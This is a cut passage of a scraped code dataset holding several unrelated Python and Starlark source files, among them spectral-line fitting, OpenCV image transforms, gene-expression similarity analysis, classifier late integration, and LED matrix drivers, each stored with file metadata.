)\n","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"606231163","text":"import numpy as np\nfrom oh_lines import OHLines\nfrom scipy.interpolate import interp1d\nfrom reidentify import reidentify_lines_all\n\ndef get_ref_list(ohlines, line_indices_list,\n orders_w_solution, wvl_solutions, s_list):\n ref_wvl_list = []\n ref_pixel_list = []\n for o, wvl, s in zip(orders_w_solution,\n wvl_solutions, s_list):\n if o not in line_indices_list:\n ref_wvl_list.append([])\n ref_pixel_list.append([])\n continue\n line_indices = line_indices_list[o]\n x = np.arange(len(s))\n um2pixel = interp1d(wvl, x, bounds_error=False)\n\n ref_wvl = [ohlines.um[l] for l in line_indices]\n ref_pixel = [um2pixel(w) for w in ref_wvl]\n\n nan_filter = [np.all(np.isfinite(p)) for p in ref_pixel]\n\n # there could be cases when the ref lines fall out of bounds,\n # resulting nans.\n ref_wvl_list.append([r for r, m in zip(ref_wvl, nan_filter) if m])\n ref_pixel_list.append([r for r, m in zip(ref_pixel, nan_filter) if m])\n\n return ref_wvl_list, ref_pixel_list\n\n\ndef fit_ohlines_parameters(ohlines, line_indices_list,\n orders_w_solution, wvl_solutions, s_list,\n nan_for_bad_fits=True):\n\n ref_wvl_list, ref_pixel_list = \\\n get_ref_list(ohlines, line_indices_list,\n orders_w_solution, wvl_solutions,\n s_list)\n\n fit_results = reidentify_lines_all(s_list, ref_pixel_list,\n sol_list_transform=None)\n\n\n # check fit status and replace with nan when fit is not successful.\n if nan_for_bad_fits:\n for r in fit_results:\n for r1 in r[0]:\n if r1[2] < 0:\n r1[0][:] = np.nan\n\n return ref_wvl_list, ref_pixel_list, fit_results\n\n\ndef fit_ohlines(ohlines, line_indices_list,\n orders_w_solution, wvl_solutions, s_list):\n\n ref_wvl_list, ref_pixel_list, fit_results = \\\n fit_ohlines_parameters(ohlines, line_indices_list,\n orders_w_solution,\n wvl_solutions, s_list,\n nan_for_bad_fits=False)\n\n fitted_positions = retrieve_positions_from_fit(fit_results)\n\n reidentified_lines = []\n for ref_wvl, positions in zip(ref_wvl_list, fitted_positions):\n reidentified_lines.append((positions,\n np.array(map(np.mean, ref_wvl))))\n\n return ref_pixel_list, reidentified_lines\n\n\ndef fit_ohlines_pixel(s_list, ref_pixel_list):\n\n fit_results = reidentify_lines_all(s_list, ref_pixel_list,\n sol_list_transform=None)\n\n # extract centroids from the fit\n fitted_positions = []\n for results_, dpix_list in fit_results:\n\n positions = [sol_[0][0] + dpix for sol_, dpix in \\\n zip(results_, dpix_list)]\n\n # reidentified_lines.append((np.concatenate(fitted_positions),\n # np.concatenate(ref_wvl)))\n\n fitted_positions.append(np.array(map(np.mean, positions)))\n\n return fitted_positions\n\n\ndef retrieve_positions_from_fit(fit_results):\n\n # extract centroids from the fit\n fitted_positions = []\n for results_, dpix_list in fit_results:\n\n positions = [sol_[0][0] + dpix for sol_, dpix in \\\n zip(results_, dpix_list)]\n\n # reidentified_lines.append((np.concatenate(fitted_positions),\n # np.concatenate(ref_wvl)))\n\n fitted_positions.append(np.array(map(np.mean, positions)))\n\n return fitted_positions\n\n\nif __name__ == \"__main__\":\n\n log_20140525 = dict(flat_off=range(64, 74),\n flat_on=range(74, 84),\n thar=range(3, 8),\n sky=[29])\n\n from igrins_log import IGRINSLog\n igrins_log = IGRINSLog(\"20140525\", log_20140525)\n\n ohlines = OHLines()\n\n igrins_orders = {}\n igrins_orders[\"H\"] = range(99, 122)\n igrins_orders[\"K\"] = range(72, 94)\n\n ref_utdate = \"20140316\"\n band = \"K\"\n\n import json\n json_name = \"ref_ohlines_indices_%s.json\" % (ref_utdate,)\n ref_ohline_indices_map = json.load(open(json_name))\n ref_ohline_indices = ref_ohline_indices_map[band]\n\n json_name = \"wvl_sol_phase0_%s_%s.json\" % (band, igrins_log.date)\n wvl_solutions = json.load(open(json_name))\n\n # load spec\n object_name = \"sky\"\n specname = \"arc_spec_%s_%s_%s.json\" % (object_name,\n band,\n igrins_log.date)\n\n import json\n s_list = json.load(open(specname))\n\n for wvl, s in zip(wvl_solutions, s_list):\n plot(wvl, s)\n\n\n from oh_lines import OHLines\n ohlines = OHLines()\n\n # from fit_gaussian import fit_gaussian_simple\n\n # Now we fit with gaussian profile for matched positions.\n\n from scipy.interpolate import interp1d\n from reidentify import reidentify_lines_all\n\n x = np.arange(2048)\n\n\n line_indices_list = [ref_ohline_indices[str(o)] for o in igrins_orders[band]]\n\n ref_pixel_list, reidentified_lines = \\\n fit_ohlines(ohlines, line_indices_list,\n wvl_solutions, s_list)\n\n\n\n ######\n\n from ecfit.ecfit import get_ordered_line_data, fit_2dspec, check_fit\n\n # d_x_wvl = {}\n # for order, z in echel.zdata.items():\n # xy_T = affine_tr.transform(np.array([z.x, z.y]).T)\n # x_T = xy_T[:,0]\n # d_x_wvl[order]=(x_T, z.wvl)\n\n reidentified_lines_map = dict(zip(igrins_orders[band], reidentified_lines))\n\n if band == \"K\":\n json_name = \"hitran_reidentified_K_%s.json\" % igrins_log.date\n r = json.load(open(json_name))\n for i, s in r.items():\n ss = reidentified_lines_map[int(i)]\n ss0 = np.concatenate([ss[0], s[\"pixel\"]])\n ss1 = np.concatenate([ss[1], s[\"wavelength\"]])\n reidentified_lines_map[int(i)] = (ss0, ss1)\n\n xl, yl, zl = get_ordered_line_data(reidentified_lines_map)\n # xl : pixel\n # yl : order\n # zl : wvl * order\n\n x_domain = [0, 2047]\n orders_band = igrins_orders[band]\n #orders = igrins_orders[band]\n y_domain = [orders_band[0]-2, orders_band[-1]+2]\n x_degree, y_degree = 4, 3\n #x_degree, y_degree = 3, 2\n p, m = fit_2dspec(xl, yl, zl, x_degree=x_degree, y_degree=y_degree,\n x_domain=x_domain, y_domain=y_domain)\n\n # filter out the line indices not well fit by the surface\n\n keys = reidentified_lines_map.keys()\n di_list = [len(reidentified_lines_map[k][0]) for k in keys]\n\n endi_list = np.add.accumulate(di_list)\n\n filter_mask = [m[endi-di:endi] for di, endi in zip(di_list, endi_list)]\n #from itertools import compress\n # _ = [list(compress(indices, mm)) for indices, mm \\\n # in zip(line_indices_list, filter_mask)]\n # line_indices_list_filtered = _\n\n reidentified_lines_ = [reidentified_lines_map[k] for k in keys]\n _ = [(v[0][mm], v[1][mm]) for v, mm \\\n in zip(reidentified_lines_, filter_mask)]\n\n reidentified_lines_map_filtered = dict(zip(igrins_orders[band], _))\n\n\n if 1:\n import matplotlib.pyplot as plt\n fig = plt.figure(figsize=(12, 7))\n check_fit(fig, xl, yl, zl, p,\n orders_band,\n reidentified_lines_map)\n fig.tight_layout()\n\n fig = plt.figure(figsize=(12, 7))\n check_fit(fig, xl[m], yl[m], zl[m], p,\n orders_band,\n reidentified_lines_map_filtered)\n fig.tight_layout()\n","sub_path":"libs/reidentify_ohlines.py","file_name":"reidentify_ohlines.py","file_ext":"py","file_size_in_byte":7721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"360729901","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\"\"\"\n 图像的几何变换从原理上看主要包括两种:\n 基于2×3矩阵的仿射变换(平移、缩放、旋转和翻转等);基于3×3矩阵的透视变换\n\"\"\"\n\n# 读入原图\nsrcImage = cv2.imread(\"./images/lenargb.bmp\", cv2.IMREAD_COLOR)\ncv2.imshow(\"0 Source Image\", srcImage)\n\n\"\"\"\n1. 仿射变换-旋转 cv::getRotationMatrix2D()\n\n retval = cv.getRotationMatrix2D(center, angle, scale)\n 参数1:图片的旋转中心\n 参数2:旋转角度(正:逆时针,负:顺时针)\n 参数3:缩放比例,0.5表示缩小一半\n\"\"\"\n# 顺时针45°旋转图片并将其缩小一半\nrows, cols = srcImage.shape[:2]\n\nMatrix = cv2.getRotationMatrix2D((cols / 2, rows / 2), 45, 0.5)\nrotateImage = cv2.warpAffine(srcImage, Matrix, (cols, rows))\ncv2.imshow('1 Rotation', rotateImage)\n\n\n\"\"\"\n2. 仿射变换-平移 cv::warpAffine()\n\n dst = cv.warpAffine(src, M, dsize[, dst[, flags[, borderMode[, borderValue]]]])\n\"\"\"\n# 定义平移矩阵,需要是numpy的float32类型\n# 向x轴方向右移100,向y轴方向上移50\nMatrix = np.float32([[1, 0, 100], [0, 1, 50]])\n# 用仿射变换实现平移\ntransImage = cv2.warpAffine(srcImage, Matrix, (cols, rows))\ncv2.imshow(\"2 Translation\", transImage)\n\n\n\"\"\"\n3. 仿射变换-缩放 cv2::resize()\n\n dst = cv.resize(src, dsize[, dst[, fx[, fy[, interpolation]]]])\n dsize:输出图像的尺寸。如果为None,则由此公式求得:dsize = Size(round(fx*src.cols), round(fy*src.rows))\n\"\"\"\n# 按照指定的宽度、高度缩放图片\nzoomImage1 = cv2.resize(srcImage, (256, 256))\n# 按照比例缩放,将x,y轴均放大1.5倍\nzoomImage2 = cv2.resize(srcImage, None, fx=1.5, fy=1.5, interpolation = cv2.INTER_LINEAR)\ncv2.imshow(\"3-1 Zoom in\", zoomImage1), cv2.imshow(\"3-2 Zonm out\", zoomImage2)\n\n\n\"\"\"\n4. 仿射变换-翻转 cv::flip()\n\n dst = cv.flip(src, flipCode[, dst])\n 其中,参数flipCode = 0:垂直翻转(沿x轴);参数flipCode > 0: 水平翻转(沿y轴);参数flipCode < 0: 水平垂直翻转。\n\"\"\"\ndstImage = cv2.flip(srcImage, 1)\ncv2.imshow(\"4 flip\", dstImage)\n\n\n\"\"\"\n5. 透视变换:将图像从一个视平面投影到另外一个视平面的过程;\n 透视变换的一般过程:读入图片,获取边界点,定义目标边界点,获取转换矩阵,执行转换;\n\n retval = cv.getPerspectiveTransform(src, dst[, solveMethod])\n\"\"\"\nwarpImage = cv2.imread(\"images/warp.jpg\")\nwarpImage = cv2.resize(warpImage, None, fx=0.6, fy=0.6)\ncv2.imshow(\"5-1 Warp Image\", warpImage)\n\n# 源图像中四边形顶点的坐标\nsrcPoint = np.float32([[91, 171], [742,26], [18, 1135], [825, 1220]])\n# 目标图像中相应的四边形顶点的坐标(左上、右上、左下、右下)\ndstPoint = np.float32([[0, 0], [900, 0], [0, 1200], [900, 1200]])\n# 生成透视变换矩阵\nMatrix = cv2.getPerspectiveTransform(srcPoint, dstPoint)\n# 进行透视变换\ndstImage = cv2.warpPerspective(warpImage, Matrix, (960, 1280))\ndstImage = cv2.resize(dstImage, None, fx=0.6, fy=0.6)\ncv2.imshow(\"5-2 Perspective Transformation\", dstImage)\n\n\ncv2.waitKey(0)","sub_path":"practice-4/task_8.py","file_name":"task_8.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"412771789","text":"import os\nimport sys\nimport pickle\nimport linecache\nimport numpy as np\nimport cPickle as pickle\n\nfrom Sample import *\n\nif not os.path.exists('Data.pickle'):\n print('Data.pickle missing! Program abort.')\n sys.exit()\nelse :\n AllData = pickle.load(open('Data.pickle' , 'rb' ))\nif not os.path.exists('Data_avg.pickle'):\n print('Data_avg.pickle missing! Program abort.')\n sys.exit()\nelse :\n Data_avg = pickle.load(open('Data_avg.pickle' , 'rb' ))\nif not os.path.exists('Data_std.pickle'):\n print('Data_std.pickle missing! Program abort.')\n sys.exit()\nelse :\n Data_std = pickle.load(open('Data_std.pickle' , 'rb' ))\nif not os.path.exists('Index_Sample.pickle'):\n print('Data.pickle missing! Program abort.')\n sys.exit()\nelse :\n SampleIndex = pickle.load(open('Index_Sample.pickle', 'rb'))\nif not os.path.exists('Index_Gene.pickle'):\n print('Index_Gene.pickle missing! Program abort.')\n sys.exit()\nelse :\n GeneIndex = pickle.load(open('Index_Gene.pickle', 'rb'))\n\ndef AnalyticsFileCheck():\n AnalyticsFile = 'genes.fpkm_table'\n if not os.path.exists(AnalyticsFile):\n print('Can not find the file to be search.')\n sys.exit()\n else :\n FileTitle = linecache.getline(AnalyticsFile, 1).replace('\\n','').split('\\t')\n if len(FileTitle)>2 :\n print('Make sure file have only one sample.')\n else :\n SearchID = FileTitle[1]\n LineCount = 0\n FileInput = open(AnalyticsFile, 'rb')\n while True:\n buffer = FileInput.read(8192 * 1024)\n if not buffer:\n break\n LineCount += buffer.count(b'\\n')\n AnalyticsData = np.zeros((1, LineCount))\n AnalyticsGeneIndex = []\n for eachLine in islice(open(AnalyticsFile), 1, None) :\n AnalyticsGeneIndex += [eachLine.replace('\\n','').split('\\t')[0]]\n AnalyticsData = eachLine.replace('\\n','').split('\\t')[1:]\n if not GeneIndex == AnalyticsGeneIndex :\n print('INFO: ANALYTICS GENE CATALOG EXCEPTION!')\n sys.exit()\n AnalyticsData_Nor = (AnalyticsData - Data_avg) / Data_std\n\n#AnalyticsFileCheck()\n\ndef FindID(n) :\n find_flag = False \n for sample in SampleIndex :\n if n <= sample.SampleEndsIn :\n find_flag = True\n return str(sample.SampleID)\n if not find_flag :\n print('STATUS: Can not find the sample!')\n sys.exit()\n\nprint('STATUS: pre-Analytics Check Complete.')\n\nx=input(\"STATUS: Select one sample from sample set(0, \" + str(AllData.shape[0])+\"): \")\n\nprint('INFO: SampleID of input number:'+FindID(x))\n\ndef Euclidean_DM(x,y) :\n return math.sqrt(np.nansum((x - y) ** 2))\n\ndef Pearson_DM(x,y) :\n return np.nansum(x * y)/math.sqrt(np.nansum(x * x) *np.nansum(y * y))\n\ndef Spearman_DM(x,y) :\n n = x.size\n return 1 - 6*np.nansum((x - y) * (x - y))/(n ** 3 - n )\n\nDataSetSize = AllData.shape[0]\nDistance = np.zeros((DataSetSize))\nfor i in range(0,DataSetSize) :\n Distance[i]=Spearman_DM(AllData[x,:], AllData[i,:])\nAnalyticsResult = np.argsort(Distance)[::-1]\n\nOutput = []\ni = 0\nfor Result in AnalyticsResult :\n ans = str(i+1)+': '+ FindID(Result) +': '+str(Distance[Result])\n if i < 10 :\n print(ans)\n i += 1\n Output.append(ans)\nopen(r'Output.txt','w').write('\\r\\n'.join(str(num)[:-1] for num in Output))\nprint('INFO: Result saved as Output.txt.')\n\nHeatmap = np.zeros((DataSetSize,DataSetSize))\nfor x in range(0,DataSetSize) :\n for y in range(0,DataSetSize) :\n Heatmap[x, y]=Spearman_DM(AllData[x,:], AllData[y,:])\nnp.savetxt('Heatmap.txt',Heatmap,delimiter='\\t',newline='\\r\\n')\nprint('INFO: Heatmap saved.')\n","sub_path":"Local_Analytics.py","file_name":"Local_Analytics.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241804209","text":"import numpy as np\n\nclass LateIntegrator:\n def __init__(self, omic_splits, sm_threshold, si_threshold):\n \"\"\"\n :param omic_split: a list of omic numpy datasets, each one of shape (number samples, number omic features)\n \"\"\"\n self.sm_threshold = sm_threshold\n self.si_threshold = si_threshold\n self.y_train, self.y_test = omic_splits[0][2], omic_splits[0][3]\n self.X_train_list, self.X_test_list = self.integrate_dataset(omic_splits)\n self.num_omic_datasets = len(omic_splits)\n\n\n def set_classifier(self, classifier, name):\n self.name = name\n self.classifiers = [classifier for _ in range(self.num_omic_datasets)]\n\n\n def integrate_dataset(self, omic_splits):\n X_train_list = []\n X_test_list = []\n\n for split in omic_splits:\n X_train, X_test, _, _ = split\n X_train_list.append(X_train)\n X_test_list.append(X_test)\n\n return X_train_list, X_test_list\n\n\n def integrate_predictions(self, probabilities):\n \"\"\"\n :param probabilities: list of probabilities on all omic datasets. Global shape is [# omic, # samples, # classes]\n :return:\n \"\"\"\n probabilities = np.transpose(probabilities, (1, 0, 2)) # each element is the matrix over which perform our computations\n preds = []\n for mat in probabilities:\n S_i = np.sum(mat, axis=0) # shape = (num_classes, )\n S_a = np.sum(S_i)\n S_m = S_i/self.num_omic_datasets\n\n if np.max(S_m) < self.sm_threshold or np.max(S_i/S_a) < self.si_threshold:\n preds.append(None) # Unknown\n\n else:\n preds.append(np.argmax(S_i) + 1) # index start from 0, classes start from 1\n\n return preds\n\n\n def compute_accuracy(self, preds, train=False):\n \"\"\"\n :param train: whether to use y_train or y_test as ground truth\n \"\"\"\n\n if train:\n ground_truth = self.y_train\n else:\n ground_truth = self.y_test\n\n # Consider None as a missed prediction\n accuracy = np.sum(ground_truth == preds) / len(ground_truth)\n\n return accuracy\n\n\n def train_eval(self):\n train_proba = []\n test_proba = []\n for clf, X_train, X_test in zip(self.classifiers, self.X_train_list, self.X_test_list):\n clf.fit(X_train, self.y_train)\n train_proba.append(clf.predict_proba(X_train))\n test_proba.append(clf.predict_proba(X_test))\n\n train_preds = self.integrate_predictions(train_proba)\n test_preds = self.integrate_predictions(test_proba)\n\n train_accuracy = self.compute_accuracy(train_preds, train=True)\n test_accuracy = self.compute_accuracy(test_preds, train=False)\n\n print(self.name + \" train accuracy: {}\".format(train_accuracy))\n print(self.name + \" test accuracy: {}\".format(test_accuracy))\n","sub_path":"Lab8/a1/late_integration.py","file_name":"late_integration.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"224652872","text":"# Copyright 2017 The Bazel Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Support functions for plist-based operations.\"\"\"\n\nload(\"@build_bazel_rules_apple//apple:utils.bzl\", \"apple_action\")\n\ndef _plisttool_action(ctx, inputs, outputs, control_file, mnemonic = None):\n \"\"\"Registers an action that invokes `plisttool`.\n\n This function is a low-level helper that simply invokes `plisttool` with the\n given arguments. It is intended to be called by other functions that register\n actions for more specific resources, like Info.plist files or entitlements\n (which is why it is in a `plist_support.bzl` rather than\n `plist_actions.bzl`).\n\n Args:\n ctx: The Skylark context.\n inputs: Any `File`s that should be treated as inputs to the underlying\n action.\n outputs: Any `File`s that should be treated as outputs of the underlying\n action.\n control_file: The `File` containing the control struct to be passed to\n plisttool.\n mnemonic: The mnemonic to display when the action executes. Defaults to\n None.\n \"\"\"\n apple_action(\n ctx,\n inputs = inputs + [control_file],\n outputs = outputs,\n executable = ctx.executable._plisttool,\n arguments = [control_file.path],\n mnemonic = mnemonic,\n )\n\n# Define the loadable module that lists the exported symbols in this file.\nplist_support = struct(\n plisttool_action = _plisttool_action,\n)\n","sub_path":"apple/bundling/plist_support.bzl","file_name":"plist_support.bzl","file_ext":"bzl","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"8948845","text":"#! /usr/bin/env python\nimport sys\nimport numpy as np\nimport itertools as it\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom roc_model import ROCModel\nfrom heat_problem import HeatProblem\nfrom analysis_utils import (aggregate_current_vectors,\n print_current_table,\n energy_flow,\n plot_heatmap)\n\nexp_largest_mesh = 6\nprob_size = 2**exp_largest_mesh\nsource = (0, 0, 1, 1)\nsink = (prob_size-1, prob_size-1, 1, 1)\ncond_exp = -3\nconductance = 10**cond_exp\nhp = HeatProblem(prob_size, source, sink, conductance, src_val=10.)\n\nuse_cached = True\n\nfilename='tmp/bo_err_{}'\nground_truth_mesh = ROCModel(2**exp_largest_mesh)\nexp_size_range = range(2,exp_largest_mesh)\nmeshes = {exp_size:ROCModel(2**exp_size) for exp_size in exp_size_range}\n\n\ndef blue_p(exp_mesh_size):\n val = 2**(exp_mesh_size-2) # 1/4 point\n return (val,val)\n\ndef orange_p(exp_mesh_size):\n val = 3*2**(exp_mesh_size-2) # 3/4 point\n return (val,val)\n\ndef get_results(mesh, cached=False):\n import os.path\n\n mesh.load_problem(hp)\n f = filename.format(mesh.w)\n exists = os.path.exists(f+'.out')\n if cached and exists:\n print('Using cache' + f)\n mesh.init_from_cache(f)\n else:\n mesh.run_spice_solver(f)\n return mesh.final_grid\n\nbase_grid = get_results(ground_truth_mesh, cached=use_cached)\n\nblue_errs = []\norange_errs = []\nfor exp_mesh_size, mesh in meshes.items():\n print(exp_mesh_size)\n\n # grid is a numpy array\n tmp_grid = get_results(mesh, cached=use_cached)\n\n tmp_bp = blue_p(exp_mesh_size)\n tmp_op = orange_p(exp_mesh_size)\n blue_errs.append(abs(tmp_grid[tmp_bp]-base_grid[tmp_bp]))\n orange_errs.append(abs(tmp_grid[tmp_op]-base_grid[tmp_op]))\n\n\nrect = 0.1,0.2,0.8,0.7\nfig = plt.figure(figsize=(10,5))\nax = fig.add_axes(rect)\n\nsizes = [2**i for i in exp_size_range]\n\ndef custom_plot(ax, *xy):\n ax.plot(*xy, marker='o',\n markerfacecolor='none',\n markeredgewidth=2)\n\n ax.set_xlabel('Mesh Size')\n ax.set_xticks(sizes)\n ax.set_xticklabels(sizes)\n\n ax.set_ylabel('Error')\n\n ax.set_ylim((0, max([max(xy[i]) for i in range(1,len(xy),2)])*1.1))\n ax.set_xlim(0,prob_size/2+1)\n\n ax.grid(b=True, axis='x')\n ax.grid(b=True, axis='y', linestyle='dashed')\n\n ax.spines['top'].set_linewidth(1)\n ax.spines['bottom'].set_linewidth(1)\n ax.spines['left'].set_linewidth(1)\n ax.spines['right'].set_linewidth(1)\n\ncustom_plot(ax, sizes, blue_errs, sizes, orange_errs)\n# ax.plot(sizes, blue_errs, sizes, orange_errs)\n# ax.set_xticks(sizes)\n# ax.set_xticklabels(sizes)\n# ax.set_ylim((0, max(max(blue_errs), max(orange_errs))*1.1))\n# ax.set_xlim(0,2**(exp_largest_mesh-1)*1.1)\nplt.show()\n","sub_path":"test/scalable_mesh/accuracy/blue_orange_errs.py","file_name":"blue_orange_errs.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"329777305","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2017 Richard Hull and contributors\n# See LICENSE.rst for details.\n\n# Example usage:\n#\n# from luma.core.interface.serial import spi, noop\n# from luma.core.render import canvas\n# from luma.led_matrix.device import max7219\n#\n# serial = spi(port=0, device=0, gpio=noop())\n# device = max7219(serial, width=8, height=8)\n#\n# with canvas(device) as draw:\n# draw.rectangle(device.bounding_box, outline=\"white\", fill=\"black\")\n#\n# As soon as the with-block scope level is complete, the graphics primitives\n# will be flushed to the device.\n#\n# Creating a new canvas is effectively 'carte blanche': If you want to retain\n# an existing canvas, then make a reference like:\n#\n# c = canvas(device)\n# for X in ...:\n# with c as draw:\n# draw.rectangle(...)\n#\n# As before, as soon as the with block completes, the canvas buffer is flushed\n# to the device\n\nfrom luma.core.interface.serial import noop\nfrom luma.core.device import device\nfrom luma.core.util import deprecation\nimport luma.core.error\nimport luma.led_matrix.const\nfrom luma.led_matrix.segment_mapper import dot_muncher\n\n\n__all__ = [\"max7219\", \"ws2812\", \"neopixel\", \"apa102\"]\n\n\nclass max7219(device):\n \"\"\"\n Encapsulates the serial interface to a series of 8x8 LED matrixes\n daisychained together with MAX7219 chips. On creation, an initialization\n sequence is pumped to the display to properly configure it. Further control\n commands can then be called to affect the brightness and other settings.\n \"\"\"\n def __init__(self, serial_interface=None, width=8, height=8, cascaded=None, rotate=0,\n block_orientation=0, **kwargs):\n super(max7219, self).__init__(luma.led_matrix.const.max7219, serial_interface)\n\n # Derive (override) the width and height if a cascaded param supplied\n if cascaded is not None:\n width = cascaded * 8\n height = 8\n\n self.capabilities(width, height, rotate)\n self.segment_mapper = dot_muncher\n\n if width <= 0 or width % 8 != 0 or height <= 0 or height % 8 != 0:\n raise luma.core.error.DeviceDisplayModeError(\n \"Unsupported display mode: {0} x {1}\".format(width, height))\n\n assert block_orientation in [0, 90, -90, 180, \"horizontal\", \"vertical\"]\n if block_orientation == \"vertical\":\n msg = (\n \"WARNING! block_orientation=\\\"vertical\\\" is now deprecated and \"\n \"should be changed to block_orientation=-90 to acheive the same \"\n \"effect. Use of \\\"vertical\\\" will be removed entirely beginning \"\n \"v1.0.0\")\n deprecation(msg)\n self._correction_angle = -90\n elif block_orientation == \"horizontal\":\n msg = (\n \"WARNING! block_orientation=\\\"horizontal\\\" is now deprecated and \"\n \"should be changed to block_orientation=0 to acheive the same \"\n \"effect. Use of \\\"horizontal\\\" will be removed entirely beginning \"\n \"v1.0.0\")\n deprecation(msg)\n self._correction_angle = 0\n else:\n self._correction_angle = block_orientation\n\n self.cascaded = cascaded or (width * height) // 64\n self._offsets = [(y * self._w) + x\n for y in range(self._h - 8, -8, -8)\n for x in range(self._w - 8, -8, -8)]\n self._rows = list(range(8))\n\n self.data([self._const.SCANLIMIT, 7] * self.cascaded)\n self.data([self._const.DECODEMODE, 0] * self.cascaded)\n self.data([self._const.DISPLAYTEST, 0] * self.cascaded)\n\n self.contrast(0x70)\n self.clear()\n self.show()\n\n def preprocess(self, image):\n \"\"\"\n Performs the inherited behviour (if any), and if the LED matrix\n orientation is declared to need correction, each 8x8 block of pixels\n is rotated 90° clockwise or counter-clockwise.\n \"\"\"\n image = super(max7219, self).preprocess(image)\n\n if self._correction_angle != 0:\n image = image.copy()\n for y in range(0, self._h, 8):\n for x in range(0, self._w, 8):\n box = (x, y, x + 8, y + 8)\n rotated_block = image.crop(box).rotate(self._correction_angle)\n image.paste(rotated_block, box)\n\n return image\n\n def display(self, image):\n \"\"\"\n Takes a 1-bit :py:mod:`PIL.Image` and dumps it to the LED matrix display\n via the MAX7219 serializers.\n \"\"\"\n assert(image.mode == self.mode)\n assert(image.size == self.size)\n\n image = self.preprocess(image)\n\n i = 0\n d0 = self._const.DIGIT_0\n step = 2 * self.cascaded\n offsets = self._offsets\n rows = self._rows\n\n buf = bytearray(8 * step)\n pix = list(image.getdata())\n\n for digit in range(8):\n for daisychained_device in offsets:\n byte = 0\n idx = daisychained_device + digit\n for y in rows:\n if pix[idx] > 0:\n byte |= 1 << y\n idx += self._w\n\n buf[i] = digit + d0\n buf[i + 1] = byte\n i += 2\n\n buf = list(buf)\n for i in range(0, len(buf), step):\n self.data(buf[i:i + step])\n\n def contrast(self, value):\n \"\"\"\n Sets the LED intensity to the desired level, in the range 0-255.\n\n :param level: Desired contrast level in the range of 0-255.\n :type level: int\n \"\"\"\n assert(0 <= value <= 255)\n self.data([self._const.INTENSITY, value >> 4] * self.cascaded)\n\n def show(self):\n \"\"\"\n Switches the display mode OFF, putting the device in low-power\n sleep mode.\n \"\"\"\n self.data([self._const.SHUTDOWN, 1] * self.cascaded)\n\n def hide(self):\n \"\"\"\n Sets the display mode ON, waking the device out of a prior\n low-power sleep mode.\n \"\"\"\n self.data([self._const.SHUTDOWN, 0] * self.cascaded)\n\n\nclass ws2812(device):\n \"\"\"\n Encapsulates the serial interface to a series of RGB neopixels\n daisy-chained together with WS281x chips. On creation, the array is\n initialized with the correct number of cascaded devices. Further control\n commands can then be called to affect the brightness and other settings.\n\n :param dma_interface: The WS2812 interface to write to (usually omit this\n parameter and it will default to the correct value - it is only needed\n for testing whereby a mock implementation is supplied)\n :param width: The number of pixels laid out horizontally\n :type width: int\n :param height: The number of pixels laid out vertically\n :type width: int\n :param cascaded: The number of pixels in a single strip - if supplied, this\n will override ``width`` and ``height``.\n :type width: int\n :param rotate: Whether the device dimenstions should be rotated in-situ:\n A value of: 0=0°, 1=90°, 2=180°, 3=270°. If not supplied, zero is\n assumed.\n :type rotate: int\n :param mapping: An (optional) array of integer values that translate the\n pixel to physical offsets. If supplied, should be the same size as\n ``width * height``\n :type mapping: int[]\n\n .. versionadded:: 0.4.0\n \"\"\"\n def __init__(self, dma_interface=None, width=8, height=4, cascaded=None,\n rotate=0, mapping=None, **kwargs):\n super(ws2812, self).__init__(const=None, serial_interface=noop)\n\n # Derive (override) the width and height if a cascaded param supplied\n if cascaded is not None:\n width = cascaded\n height = 1\n\n self.cascaded = width * height\n self.capabilities(width, height, rotate, mode=\"RGB\")\n self._mapping = list(mapping or range(self.cascaded))\n assert(self.cascaded == len(self._mapping))\n self._ws2812 = dma_interface or self.__ws2812__()\n self._ws2812.init(width * height)\n\n self.contrast(0x70)\n self.clear()\n self.show()\n\n def __ws2812__(self):\n import ws2812\n return ws2812\n\n def display(self, image):\n \"\"\"\n Takes a 24-bit RGB :py:mod:`PIL.Image` and dumps it to the daisy-chained\n WS2812 neopixels.\n \"\"\"\n assert(image.mode == self.mode)\n assert(image.size == self.size)\n\n ws = self._ws2812\n m = self._mapping\n for idx, (r, g, b) in enumerate(image.getdata()):\n ws.setPixelColor(m[idx], r, g, b)\n\n ws.show()\n\n def show(self):\n \"\"\"\n Not supported\n \"\"\"\n pass\n\n def hide(self):\n \"\"\"\n Not supported\n \"\"\"\n pass\n\n def contrast(self, value):\n \"\"\"\n Sets the LED intensity to the desired level, in the range 0-255.\n\n :param level: Desired contrast level in the range of 0-255.\n :type level: int\n \"\"\"\n assert(0 <= value <= 255)\n ws = self._ws2812\n ws.setBrightness(value / 255.0)\n ws.show()\n\n def cleanup(self):\n \"\"\"\n Attempt to reset the device & switching it off prior to exiting the\n python process.\n \"\"\"\n super(ws2812, self).cleanup()\n self._ws2812.terminate()\n\n\n# Alias for ws2812\nneopixel = ws2812\n\n# 8x8 Unicorn HAT has a 'snake-like' layout, so this translation\n# mapper linearizes that arrangement into a 'scan-like' layout.\nUNICORN_HAT = [\n 7, 6, 5, 4, 3, 2, 1, 0,\n 8, 9, 10, 11, 12, 13, 14, 15,\n 23, 22, 21, 